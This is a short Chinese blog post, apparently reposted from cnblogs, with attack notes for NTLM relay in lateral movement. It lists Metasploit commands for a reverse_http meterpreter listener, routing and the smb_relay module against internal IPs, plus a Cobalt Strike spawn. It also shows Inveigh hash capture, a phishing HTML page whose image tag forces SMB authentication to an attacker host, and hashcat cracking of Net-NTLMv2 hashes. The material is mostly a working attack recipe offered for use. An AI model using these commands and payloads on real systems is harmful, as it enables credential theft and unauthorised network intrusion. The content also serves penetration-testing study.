首页 > 其他分享 >NTLM中继攻击

NTLM中继攻击

时间:2022-10-12 13:11:27浏览次数:77  
标签:中继 set Hash 攻击 NTLM 192.168 run

基本知识点:

与NLTM认证相关的安全问题主要有Pass The Hash、利用NTLM进行信息收集、Net-NTLM Hash破解、NTLM Relay几种。PTH前期已经了,运用mimikatz、impacket工具包的一些脚本、CS等等都可以利用,NTLM Relay又包括(relay to smb,ldap,ews)
可以应用在获取不到明文或HASH时采用的手法,但也要注意手法的必备条件。

横向移动-NTLM中继攻击-Relay重放-SMB上线

条件:通讯双方当前用户密码一致
CS:

spawn l-msf
MSF:
监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run
添加路由:
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
backgroup //返回
重发模块:
use exploit/windows/smb/smb_relay
set smbhost 192.168.46.135 //转发攻击目标
set lhost 192.168.46.166 //设置本地IP
set autorunscript post/windows/manage/migrate
主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.X //设置连接目标
run

横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh
1、监听拦截
Inveigh.exe
获取到的是NET NTLM HASH V1或V2
2、触发拦截
dir \192.168.3.x\c$
2.1、钓鱼触发

http://192.168.3.31/1.html
<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、破解密文
hashcat -m 5600 hash pass.txt --show

标签:中继,set,Hash,攻击,NTLM,192.168,run
From: https://www.cnblogs.com/rayob1/p/16784180.html

相关文章